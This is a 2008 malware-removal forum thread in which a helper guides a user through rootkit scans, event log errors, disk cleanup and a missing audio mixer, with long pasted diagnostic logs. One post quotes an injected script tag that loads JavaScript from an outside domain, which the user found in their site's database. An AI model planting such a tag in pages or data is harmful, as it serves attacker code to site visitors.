Login  Malware Removal & HijackThis Logs |
| |
| |
| | Thread Tools |
30-Jun-2008, 08:11 PM
#16 | |||||
| Yes indeed. You never know what you're getting when you go the illegal route. Download GMER from: http://gmer.net/index.php Save it somewhere on your hard drive and unzip it to desktop. Double click the gmer.exe to run it and select the rootkit tab and press scan. When the scan is done, click Copy. This will copy the report to the clipboard. Paste it into Notepad and save it and also paste the log report back here please.
__________________ Microsoft MVP - Consumer Security Alliance of Security Analysis Professionals |
| |
01-Jul-2008, 12:08 AM
#17 | |||||
| Thank you for helping me, especially considering the source of my problems. I've also just noticed some problems with a Flash .swf file I published after my computer was infected. The file uses xml to communicate with a database to load content dynamically, and some of this content is now showing up with this string appended: *<script src=http://www.adwste.mobi/b.js>* When we looked at the database, that value was literally in there. My flash file only reads values from the database, but given the timing, I'm concerned it could have something to do with my local machine issues, something unseen in the Flash publishing process? The only input the Flash movie takes is search strings, but the database manager has taken steps to discard suspect characters and words. I did a Google search on that script reference, and it seems to come up all over the place, attached to all different kinds of web sites. Is this a known problem? Thanks again. gmer scan below: ------------ GMER 1.0.14.14536 - http://www.gmer.net Rootkit scan 2008-06-30 22:36:03 Windows 5.1.2600 Service Pack 2 ---- System - GMER 1.0.14 ---- SSDT 872431B0 ZwConnectPort SSDT \??\C:\Program Files\SUPERAntiSpyware\SASKUTIL.sys (SASKUTIL.SYS/SUPERAdBlocker.com and SUPERAntiSpyware.com) ZwTerminateProcess [0xAAE76F20] ---- User code sections - GMER 1.0.14 ---- .text C:\Program Files\Internet Explorer\IEXPLORE.EXE[3400] USER32.dll!DialogBoxParamW 7E42555F 5 Bytes JMP 42F0F301 C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation) .text C:\Program Files\Internet Explorer\IEXPLORE.EXE[3400] USER32.dll!DialogBoxIndirectParamW 7E432032 5 Bytes JMP 430A1667 C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation) .text C:\Program Files\Internet Explorer\IEXPLORE.EXE[3400] USER32.dll!MessageBoxIndirectA 7E43A04A 5 Bytes JMP 430A15E8 C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation) .text C:\Program Files\Internet Explorer\IEXPLORE.EXE[3400] USER32.dll!DialogBoxParamA 7E43B10C 5 Bytes JMP 430A162C C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation) .text C:\Program Files\Internet Explorer\IEXPLORE.EXE[3400] USER32.dll!MessageBoxExW 7E4505D8 5 Bytes JMP 430A1574 C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation) .text C:\Program Files\Internet Explorer\IEXPLORE.EXE[3400] USER32.dll!MessageBoxExA 7E4505FC 5 Bytes JMP 430A15AE C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation) .text C:\Program Files\Internet Explorer\IEXPLORE.EXE[3400] USER32.dll!DialogBoxIndirectParamA 7E456B50 5 Bytes JMP 430A16A2 C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation) .text C:\Program Files\Internet Explorer\IEXPLORE.EXE[3400] USER32.dll!MessageBoxIndirectW 7E4662AB 5 Bytes JMP 42F316B6 C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation) ---- Devices - GMER 1.0.14 ---- Device Fastfat.sys (Fast FAT File System Driver/Microsoft Corporation) AttachedDevice \Driver\Tcpip \Device\Ip SYMTDI.SYS (Network Dispatch Driver/Symantec Corporation) AttachedDevice \Driver\Kbdclass \Device\KeyboardClass0 SynTP.sys (Synaptics Touchpad Driver/Synaptics, Inc.) AttachedDevice \Driver\Kbdclass \Device\KeyboardClass1 SynTP.sys (Synaptics Touchpad Driver/Synaptics, Inc.) AttachedDevice \Driver\Tcpip \Device\Tcp SYMTDI.SYS (Network Dispatch Driver/Symantec Corporation) Device \Driver\SMBHC \Device\SmbHc SMBCLASS.SYS (SMBus Class Driver/Microsoft Corporation) AttachedDevice \Driver\Tcpip \Device\Udp SYMTDI.SYS (Network Dispatch Driver/Symantec Corporation) AttachedDevice \Driver\Tcpip \Device\RawIp SYMTDI.SYS (Network Dispatch Driver/Symantec Corporation) Device mrxsmb.sys (Windows NT SMB Minirdr/Microsoft Corporation) AttachedDevice fltmgr.sys (Microsoft Filesystem Filter Manager/Microsoft Corporation) ---- EOF - GMER 1.0.14 ---- |
01-Jul-2008, 12:28 PM
#18 | |||||
| Another issue - my laptop speakers have not been working lately, not sure if this has to do with infection, scans & cleanup. My device manager seems to think everything is OK and driver is updated, and I've gone through the standard help sound troubleshooter. I know I shouldn't continue downloading things at this time, but I tried to use Driver Detective to help me out. This program gave me this error: *1603: Error installing Microsoft(R) .NET Framework.* So this lead me to scanning my machine with Regcure, which turned up 1269 errors (35 COM/ActiveX entries, 5 shared DLLs, 2 application paths, 1 help file info, 34 Windows Startup items, 611 file/path references, 56 program shortcuts, 522 empty registry keys, and 3 file associations.) At this point I stopped - I did not tell the program to fix the errors. My desktop is full of tools downloaded in the past few weeks and I do fear misusing things. Should I delete/uninstall any of these? (I have SUPERAntiSpyware and Norton 360 running). Thanks. |
01-Jul-2008, 06:33 PM
#19 | |||||
| You were supposed to uninstall RegCure. Disregard its findings please. Please go to Start - Run - type in eventvwr.msc to open the event viewer. Look under both "Application" and "System" for recent (the last 48 hours or so) errors (shown in red) and if found, do this for each one. Double-click the error to open it up and then click on the icon that looks like two pieces of paper. This will copy the full error. Then "paste" the error into Notepad. Do this for each one until you have them all listed in Notepad and then copy and paste the list in a reply here please.
__________________ Microsoft MVP - Consumer Security Alliance of Security Analysis Professionals |
02-Jul-2008, 03:22 PM
#20 | |||||
| I did uninstall RegCure, and then downloaded it again (not remembering the name) after searching on that error code. It is now uninstalled again. My device manager says Microsoft Kernel Wave Audio Mixer is missing or corrupted. Below are the clippings from Application and System categories of my Event Viewer. (I did try to clear some space on my C drive) Event Type: Error Event Source: Application Hang Event Category: (101) Event ID: 1002 Date: 7/2/2008 Time: 1:41 PM User: N/A Computer: PITATA Description: Hanging application iexplore.exe, version 7.0.6000.16674, hang module hungapp, version 0.0.0.0, hang address 0x00000000. For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp. Data: 0000: 41 70 70 6c 69 63 61 74 Applicat 0008: 69 6f 6e 20 48 61 6e 67 ion Hang 0010: 20 20 69 65 78 70 6c 6f iexplo 0018: 72 65 2e 65 78 65 20 37 re.exe 7 0020: 2e 30 2e 36 30 30 30 2e .0.6000. 0028: 31 36 36 37 34 20 69 6e 16674 in 0030: 20 68 75 6e 67 61 70 70 hungapp 0038: 20 30 2e 30 2e 30 2e 30 0.0.0.0 0040: 20 61 74 20 6f 66 66 73 at offs 0048: 65 74 20 30 30 30 30 30 et 00000 0050: 30 30 30 000 ***** Event Type: Error Event Source: Application Hang Event Category: (101) Event ID: 1002 Date: 7/2/2008 Time: 11:42 AM User: N/A Computer: PITATA Description: Hanging application iexplore.exe, version 7.0.6000.16674, hang module hungapp, version 0.0.0.0, hang address 0x00000000. For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp. Data: 0000: 41 70 70 6c 69 63 61 74 Applicat 0008: 69 6f 6e 20 48 61 6e 67 ion Hang 0010: 20 20 69 65 78 70 6c 6f iexplo 0018: 72 65 2e 65 78 65 20 37 re.exe 7 0020: 2e 30 2e 36 30 30 30 2e .0.6000. 0028: 31 36 36 37 34 20 69 6e 16674 in 0030: 20 68 75 6e 67 61 70 70 hungapp 0038: 20 30 2e 30 2e 30 2e 30 0.0.0.0 0040: 20 61 74 20 6f 66 66 73 at offs 0048: 65 74 20 30 30 30 30 30 et 00000 0050: 30 30 30 000 ***** Event Type: Error Event Source: Application Hang Event Category: (101) Event ID: 1002 Date: 7/1/2008 Time: 1:19 PM User: N/A Computer: PITATA Description: Hanging application iexplore.exe, version 7.0.6000.16674, hang module hungapp, version 0.0.0.0, hang address 0x00000000. For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp. Data: 0000: 41 70 70 6c 69 63 61 74 Applicat 0008: 69 6f 6e 20 48 61 6e 67 ion Hang 0010: 20 20 69 65 78 70 6c 6f iexplo 0018: 72 65 2e 65 78 65 20 37 re.exe 7 0020: 2e 30 2e 36 30 30 30 2e .0.6000. 0028: 31 36 36 37 34 20 69 6e 16674 in 0030: 20 68 75 6e 67 61 70 70 hungapp 0038: 20 30 2e 30 2e 30 2e 30 0.0.0.0 0040: 20 61 74 20 6f 66 66 73 at offs 0048: 65 74 20 30 30 30 30 30 et 00000 0050: 30 30 30 000 ***** Event Type: Error Event Source: MsiInstaller Event Category: None Event ID: 11601 Date: 7/1/2008 Time: 10:59 AM User: PITATA\ACER USER Computer: PITATA Description: Product: Microsoft .NET Framework 2.0 -- Disk full: Out of disk space -- Volume: 'C:'; required space: 244,668 KB; available space: 103,120 KB. Free some disk space and retry. For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp. Data: 0000: 7b 37 31 33 31 36 34 36 {7131646 0008: 44 2d 43 44 33 43 2d 34 D-CD3C-4 0010: 30 46 34 2d 39 37 42 39 0F4-97B9 0018: 2d 43 44 39 45 34 45 36 -CD9E4E6 0020: 32 36 32 45 46 7d 262EF} ***** Event Type: Error Event Source: MsiInstaller Event Category: None Event ID: 11601 Date: 7/1/2008 Time: 10:57 AM User: PITATA\ACER USER Computer: PITATA Description: Product: Microsoft .NET Framework 2.0 -- Disk full: Out of disk space -- Volume: 'C:'; required space: 244,668 KB; available space: 131,824 KB. Free some disk space and retry. For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp. Data: 0000: 7b 37 31 33 31 36 34 36 {7131646 0008: 44 2d 43 44 33 43 2d 34 D-CD3C-4 0010: 30 46 34 2d 39 37 42 39 0F4-97B9 0018: 2d 43 44 39 45 34 45 36 -CD9E4E6 0020: 32 36 32 45 46 7d 262EF} ***** Event Type: Error Event Source: Application Error Event Category: None Event ID: 1000 Date: 6/30/2008 Time: 11:27 PM User: N/A Computer: PITATA Description: Faulting application iexplore.exe, version 7.0.6000.16674, faulting module unknown, version 0.0.0.0, fault address 0x07d73f68. For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp. Data: 0000: 41 70 70 6c 69 63 61 74 Applicat 0008: 69 6f 6e 20 46 61 69 6c ion Fail 0010: 75 72 65 20 20 69 65 78 ure iex 0018: 70 6c 6f 72 65 2e 65 78 plore.ex 0020: 65 20 37 2e 30 2e 36 30 e 7.0.60 0028: 30 30 2e 31 36 36 37 34 00.16674 0030: 20 69 6e 20 75 6e 6b 6e in unkn 0038: 6f 77 6e 20 30 2e 30 2e own 0.0. 0040: 30 2e 30 20 61 74 20 6f 0.0 at o 0048: 66 66 73 65 74 20 30 37 ffset 07 0050: 64 37 33 66 36 38 0d 0a d73f68.. ****************************************** Event Type: Error Event Source: SideBySide Event Category: None Event ID: 59 Date: 7/2/2008 Time: 1:39 PM User: N/A Computer: PITATA Description: Generate Activation Context failed for C:\Program Files\PC Drivers HeadQuarters\Driver Detective\DriversHQ.DriverDetective.Client.DirectX.dll. Reference error message: The operation completed successfully. . For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp. ***** Event Type: Error Event Source: SideBySide Event Category: None Event ID: 32 Date: 7/2/2008 Time: 1:39 PM User: N/A Computer: PITATA Description: Dependent Assembly Microsoft.VC90.CRT could not be found and Last Error was The referenced assembly is not installed on your system. For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp. ***** Event Type: Error Event Source: Cdrom Event Category: None Event ID: 7 Date: 7/2/2008 Time: 7:13 AM User: N/A Computer: PITATA Description: The device, \Device\CdRom0, has a bad block. For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp. Data: 0000: 03 00 68 00 01 00 b8 00 ..h...¸. 0008: 00 00 00 00 07 00 04 c0 .......À 0010: 00 01 00 00 9c 00 00 c0 ....œ..À 0018: 00 00 00 00 00 00 00 00 ........ 0020: 00 20 66 12 00 00 00 00 . f..... 0028: 54 ff 71 00 00 00 00 00 Tÿq..... 0030: ff ff ff ff 01 00 00 00 ÿÿÿÿ.... 0038: 40 00 00 c4 02 00 00 00 @..Ä.... 0040: 00 20 0a 12 48 02 00 40 . ..H..@ 0048: 00 00 00 00 0a 00 00 00 ........ 0050: 00 00 00 00 a0 b1 20 87 .... ± ‡ 0058: 00 00 00 00 60 39 1d 87 ....`9.‡ 0060: 00 00 00 00 c4 4c 02 00 ....ÄL.. 0068: 28 00 00 02 4c c4 00 00 (...LÄ.. 0070: 02 00 00 00 00 00 00 00 ........ 0078: 70 00 03 00 00 00 00 12 p....... 0080: 00 00 00 00 11 00 00 00 ........ 0088: 00 00 00 00 00 00 00 00 ........ ***** Event Type: Error Event Source: SideBySide Event Category: None Event ID: 59 Date: 7/1/2008 Time: 9:53 PM User: N/A Computer: PITATA Description: Generate Activation Context failed for C:\WINDOWS\system32\TAPI32.dll. Reference error message: Error Message is unavailable . For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp. ***** Event Type: Error Event Source: W32Time Event Category: None Event ID: 29 Date: 7/1/2008 Time: 9:26 AM User: N/A Computer: PITATA Description: The time provider NtpClient is configured to acquire time from one or more time sources, however none of the sources are currently accessible. No attempt to contact a source will be made for 14 minutes. NtpClient has no source of accurate time. For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp. ***** Event Type: Error Event Source: W32Time Event Category: None Event ID: 17 Date: 7/1/2008 Time: 9:26 AM User: N/A Computer: PITATA Description: Time Provider NtpClient: An error occurred during DNS lookup of the manually configured peer 'time.windows.com,0x1'. NtpClient will try the DNS lookup again in 15 minutes. The error was: A socket operation was attempted to an unreachable host. (0x80072751) For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp. ***** Event Type: Error Event Source: Cdrom Event Category: None Event ID: 7 Date: 6/30/2008 Time: 1:55 PM User: N/A Computer: PITATA Description: The device, \Device\CdRom0, has a bad block. For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp. Data: 0000: 03 00 68 00 01 00 b8 00 ..h...¸. 0008: 00 00 00 00 07 00 04 c0 .......À 0010: 00 01 00 00 9c 00 00 c0 ....œ..À 0018: 00 00 00 00 00 00 00 00 ........ 0020: 00 20 66 12 00 00 00 00 . f..... 0028: 99 3a 59 00 00 00 00 00 ™:Y..... 0030: ff ff ff ff 01 00 00 00 ÿÿÿÿ.... 0038: 40 00 00 c4 02 00 00 00 @..Ä.... 0040: 00 20 0a 12 48 02 00 40 . ..H..@ 0048: 00 00 00 00 0a 00 00 00 ........ 0050: 00 00 00 00 08 92 2c 87 .....’,‡ 0058: 00 00 00 00 60 b9 1f 87 ....`¹.‡ 0060: 00 00 00 00 c4 4c 02 00 ....ÄL.. 0068: 28 00 00 02 4c c4 00 00 (...LÄ.. 0070: 02 00 00 00 00 00 00 00 ........ 0078: 70 00 03 00 00 00 00 12 p....... 0080: 00 00 00 00 11 00 00 00 ........ 0088: 00 00 00 00 00 00 00 00 ........ |
02-Jul-2008, 04:10 PM
#21 | |||||
| How much RAM do you have? To find out right-click My Computer and select Properties. What is the size of the hard drive and how much is free? To check, click on My Computer and right-click your C drive and select "Properties". What is the size of the paging file? To find that information, do this: Click Start, and then click Control Panel. If in Category view, click on Click Performance and Maintenance and then click System (if in Classic view just click System). On the Advanced tab, under Performance, click Settings. On the Advanced tab, under Virtual memory, click Change. Don't change anything but let me know what it says the size of the initial file is.
__________________ Microsoft MVP - Consumer Security Alliance of Security Analysis Professionals |
03-Jul-2008, 08:07 AM
#22 | |||||
| 1.00 GB of RAM C local disk 26.8 GB with 307 MB free D local disk 27.0 GB with 477 MB free Paging file 0 right now (I had set this to minimum size recommended on D drive, but every time I restart it appears on the C drive. I have to turn it off completely, then restart, then set it to D drive. I guess I had not changed the setting in a while) My program files are @ 8 GB. I will be backing up and clearing more space today. |
03-Jul-2008, 09:12 PM
#23 | |||||
| You are very low on resources. Do you defrag and empty your temporary files and temporary Internet files regularly? Go back to the paging file and select "System Managed Size" and click "Set" and OK. See if there are old programs you're no longer using that you can uninstall to fee up some space. Click here to download ATF Cleaner by Atribune and save it to your desktop.
Then let me know what those same numbers look like now.
__________________ Microsoft MVP - Consumer Security Alliance of Security Analysis Professionals |
04-Jul-2008, 07:21 AM
#24 | |||||
| I have Norton 360 set to cleanup files and optimize disks regularly, and I often right-click the drives and do "Disk Cleanup". ATF Cleaner cleared up about 35 MB, but I was able to move some big files to storage. The numbers now- C drive: 5.18 GB free, with 1034 paging file D drive: 1.62 GB free Should I keep the paging file on the same drive with programs? Thanks. |
04-Jul-2008, 07:34 PM
#25 | |||||
| Please check the Event Viewer log again and post any errors from "application" and "system" that have occured over the last 24-36 hours (since you cleared out stuff to free up resources). |
06-Jul-2008, 04:14 AM
#26 | |||||
| There are no application errors since my last post time, but I have not been using the computer much in the past two days. The tow system errors that show are below. In the meantime, I updated my Windows (XP Home) to service pack 3. Event Type: Error Event Source: DCOM Event Category: None Event ID: 10010 Date: 7/6/2008 Time: 2:58 AM User: NT AUTHORITY\SYSTEM Computer: PITATA Description: The server {03E0E6C2-363B-11D3-B536-00902771A435} did not register with DCOM within the required timeout. For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp. ***** Event Type: Error Event Source: Service Control Manager Event Category: None Event ID: 7011 Date: 7/6/2008 Time: 2:58 AM User: N/A Computer: PITATA Description: Timeout (30000 milliseconds) waiting for a transaction response from the stisvc service. For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp. |
06-Jul-2008, 02:00 PM
#27 | |||||
| Those are not serious but the second one may indicate that you didn't disconnect your camera correctly. Did you stop the device and then wait for the message that it was safe to remove it? |
06-Jul-2008, 06:29 PM
#28 | |||||
| I probably disconnected an external hard drive at that time (I did "eject" it first, but I may have tried to access it after disconnecting?)My main concern now is that my laptop speakers are not working--I don't know if this has anything to do with my initial problem or steps taken to clear it up. I have now lost any reference to a *Microsoft Kernel Wave Audio Mixer* or any other error in the Device Manager. I think I used to have a choice of default device for sound playback and recording in the Sounds & Audio Devices control panel which I no longer have. There is only one now- Conexant AMC Audio (Windows says device is working properly, and driver updated...but programs like Driver Detective report a host of out of out-of-date drivers. ) |
06-Jul-2008, 07:27 PM
#29 | |||||
| Please do a search and let me know if you can locate this file: kmixer.sys Please open HijackThis. Click on Open Misc Tools Section Make sure that both boxes beside "Generate StartupList Log" are checked:
Click Yes at the prompt. It will open a text file. Please copy the entire contents of that page and paste it here.
__________________ Microsoft MVP - Consumer Security Alliance of Security Analysis Professionals |
07-Jul-2008, 01:47 PM
#30 | |||||
| A search yielded 8 kmixer.sys references on my computer at these locations: C:\WINDOWS\$NtServicePackUninstall$ (3 copies, kmixer.sys, kmixer.sys.000 and kmixer.sys.001) C:\WINDOWS\$NtUninstallKB920872$ C:\WINDOWS\system32\drivers C:\WINDOWS\ServicePackFiles\i386 C:\WINDOWS\$hf_mig$\KB920872\SP2QFE C:\WINDOWS\SoftwareDistribution\Download\dd9ab5193501484cf5e6884fa1d22f9e The startuplist.txt file generated by HijackThis is in two parts, below and the next post. Thank you. StartupList report, 7/7/2008, 12:32:07 PM StartupList version: 1.52.2 Started from : C:\downloads\HiJackThis.EXE Detected: Windows XP SP3 (WinNT 5.01.2600) Detected: Internet Explorer v7.00 (7.00.6000.16674) * Using default options * Including empty and uninteresting sections * Showing rarely important sections ================================================== Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\System32\Ati2evxx.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe C:\WINDOWS\Explorer.EXE C:\WINDOWS\system32\spoolsv.exe C:\Acer\eManager\anbmServ.exe C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe C:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exe C:\Program Files\Bonjour\mDNSResponder.exe C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\wscntfy.exe C:\Program Files\Synaptics\SynTP\SynTPLpr.exe C:\Program Files\Synaptics\SynTP\SynTPEnh.exe C:\Program Files\Aspire Arcade\PCMService.exe C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe C:\Program Files\Launch Manager\QtZgAcer.EXE C:\Program Files\QuickTime\qttask.exe C:\Program Files\Verizon\Servicepoint\VerizonServicepoint.exe C:\Program Files\Common Files\Symantec Shared\ccApp.exe C:\Program Files\iTunes\iTunesHelper.exe C:\Program Files\Common Files\Real\Update_OB\realsched.exe C:\Program Files\Java\jre1.6.0_06\bin\jusched.exe C:\WINDOWS\system32\WDBtnMgr.exe C:\WINDOWS\system32\ctfmon.exe C:\Program Files\AIM\aim.exe C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe C:\Program Files\Linksys EasyLink Advisor\LinksysAgent.exe C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe C:\Program Files\Messenger\msmsgs.exe C:\Program Files\WinZip\WZQKPICK.EXE C:\Program Files\iPod\bin\iPodService.exe C:\Program Files\Outlook Express\msimn.exe C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe C:\Program Files\Internet Explorer\IEXPLORE.EXE C:\downloads\HiJackThis.exe -------------------------------------------------- Listing of startup folders: Shell folders Startup: [C:\Documents and Settings\ACER USER\Start Menu\Programs\Startup] Adobe Gamma.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe Shell folders AltStartup: *Folder not found* User shell folders Startup: *Folder not found* User shell folders AltStartup: *Folder not found* Shell folders Common Startup: [C:\Documents and Settings\All Users\Start Menu\Programs\Startup] Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXE WinZip Quick Pick.lnk = C:\Program Files\WinZip\WZQKPICK.EXE Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe Shell folders Common AltStartup: *Folder not found* User shell folders Common Startup: *Folder not found* User shell folders Alternate Common Startup: *Folder not found* -------------------------------------------------- Checking Windows NT UserInit: [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon] UserInit = C:\WINDOWS\system32\userinit.exe, [HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon] *Registry key not found* [HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon] *Registry value not found* [HKCU\Software\Microsoft\Windows\CurrentVersion\Winlogon] *Registry key not found* -------------------------------------------------- Autorun entries from Registry: HKLM\Software\Microsoft\Windows\CurrentVersion\Run LaunchApp = Alaunch SynTPLpr = "C:\Program Files\Synaptics\SynTP\SynTPLpr.exe" SynTPEnh = "C:\Program Files\Synaptics\SynTP\SynTPEnh.exe" PCMService = "C:\Program Files\Aspire Arcade\PCMService.exe" IMJPMIG8.1 = "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32 MSPY2002 = "C:\WINDOWS\System32\IME\PINTLGNT\ImScInst.exe" /SYNC PHIME2002ASync = "C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE" /SYNC PHIME2002A = "C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE" /IMEName ATIPTA = "C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe" LManager = "C:\Program Files\Launch Manager\QtZgAcer.EXE" QuickTime Task = "C:\Program Files\QuickTime\qttask.exe" -atboottime VerizonServicepoint.exe = "C:\Program Files\Verizon\Servicepoint\VerizonServicepoint.exe" ccApp = "C:\Program Files\Common Files\Symantec Shared\ccApp.exe" NoteBurner = C:\Program Files\NoteBurner\VTBurnerGUI.exe /silence iTunesHelper = "C:\Program Files\iTunes\iTunesHelper.exe" TkBellExe = "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot Symantec PIF AlertEng = "C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\PIFSvc.exe" /a /m "C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\AlertEng.dll" SunJavaUpdateSched = "C:\Program Files\Java\jre1.6.0_06\bin\jusched.exe" WD Button Manager = WDBtnMgr.exe -------------------------------------------------- Autorun entries from Registry: HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce *No values found* -------------------------------------------------- Autorun entries from Registry: HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx *Registry key not found* -------------------------------------------------- Autorun entries from Registry: HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices *No values found* -------------------------------------------------- Autorun entries from Registry: HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce *Registry key not found* -------------------------------------------------- Autorun entries from Registry: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ctfmon.exe = C:\WINDOWS\system32\ctfmon.exe AIM = C:\Program Files\AIM\aim.exe -cnetwait.odl swg = C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe EasyLinkAdvisor = "C:\Program Files\Linksys EasyLink Advisor\LinksysAgent.exe" /startup SUPERAntiSpyware = C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe MSMSGS = "C:\Program Files\Messenger\msmsgs.exe" /background -------------------------------------------------- Autorun entries from Registry: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce *No values found* -------------------------------------------------- Autorun entries from Registry: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceEx *No values found* -------------------------------------------------- Autorun entries from Registry: HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices *No values found* -------------------------------------------------- Autorun entries from Registry: HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce *No values found* -------------------------------------------------- Autorun entries from Registry: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Run *Registry key not found* -------------------------------------------------- Autorun entries from Registry: HKCU\Software\Microsoft\Windows NT\CurrentVersion\Run *Registry key not found* -------------------------------------------------- Autorun entries in Registry subkeys of: HKLM\Software\Microsoft\Windows\CurrentVersion\Run [OptionalComponents] *No values found* -------------------------------------------------- Autorun entries in Registry subkeys of: HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce *No subkeys found* -------------------------------------------------- Autorun entries in Registry subkeys of: HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx *Registry key not found* -------------------------------------------------- Autorun entries in Registry subkeys of: HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices *No subkeys found* -------------------------------------------------- Autorun entries in Registry subkeys of: HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce *Registry key not found* -------------------------------------------------- Autorun entries in Registry subkeys of: HKCU\Software\Microsoft\Windows\CurrentVersion\Run [AdobeUpdater] = -------------------------------------------------- Autorun entries in Registry subkeys of: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce *No subkeys found* -------------------------------------------------- Autorun entries in Registry subkeys of: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceEx *No subkeys found* -------------------------------------------------- Autorun entries in Registry subkeys of: HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices *No subkeys found* -------------------------------------------------- Autorun entries in Registry subkeys of: HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce *No subkeys found* -------------------------------------------------- Autorun entries in Registry subkeys of: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Run *Registry key not found* -------------------------------------------------- Autorun entries in Registry subkeys of: HKCU\Software\Microsoft\Windows NT\CurrentVersion\Run *Registry key not found* -------------------------------------------------- File association entry for .EXE: HKEY_CLASSES_ROOT\exefile\shell\open\command (Default) = "%1" %* -------------------------------------------------- File association entry for .COM: HKEY_CLASSES_ROOT\comfile\shell\open\command (Default) = "%1" %* -------------------------------------------------- File association entry for .BAT: HKEY_CLASSES_ROOT\batfile\shell\open\command (Default) = "%1" %* -------------------------------------------------- File association entry for .PIF: HKEY_CLASSES_ROOT\piffile\shell\open\command (Default) = "%1" %* -------------------------------------------------- File association entry for .SCR: HKEY_CLASSES_ROOT\scrfile\shell\open\command (Default) = "%1" /S -------------------------------------------------- File association entry for .HTA: HKEY_CLASSES_ROOT\htafile\shell\open\command (Default) = C:\WINDOWS\system32\mshta.exe "%1" %* -------------------------------------------------- File association entry for .TXT: HKEY_CLASSES_ROOT\txtfile\shell\open\command (Default) = %SystemRoot%\system32\NOTEPAD.EXE %1 -------------------------------------------------- Enumerating Active Setup stub paths: HKLM\Software\Microsoft\Active Setup\Installed Components (* = disabled by HKCU twin) [<{12d0ed0d-0ee0-4f90-8827-78cefb8f4988}] * StubPath = C:\WINDOWS\system32\ieudinit.exe [>{22d6f312-b0f6-11d0-94ab-0080c74c7e95}] StubPath = C:\WINDOWS\inf\unregmp2.exe /ShowWMP [>{26923b43-4d38-484f-9b9e-de460746276c}] * StubPath = %systemroot%\system32\shmgrate.exe OCInstallUserConfigIE [>{60B49E34-C7CC-11D0-8953-00A0C90347FF}] * StubPath = RunDLL32 IEDKCS32.DLL,BrandIE4 SIGNUP [>{60B49E34-C7CC-11D0-8953-00A0C90347FF}MICROS] * StubPath = RunDLL32 IEDKCS32.DLL,BrandIE4 SIGNUP [>{881dd1c5-3dcf-431b-b061-f3f88e8be88a}] * StubPath = %systemroot%\system32\shmgrate.exe OCInstallUserConfigOE [{2C7339CF-2B09-4501-B3F3-F3508C9228ED}] * StubPath = %SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll 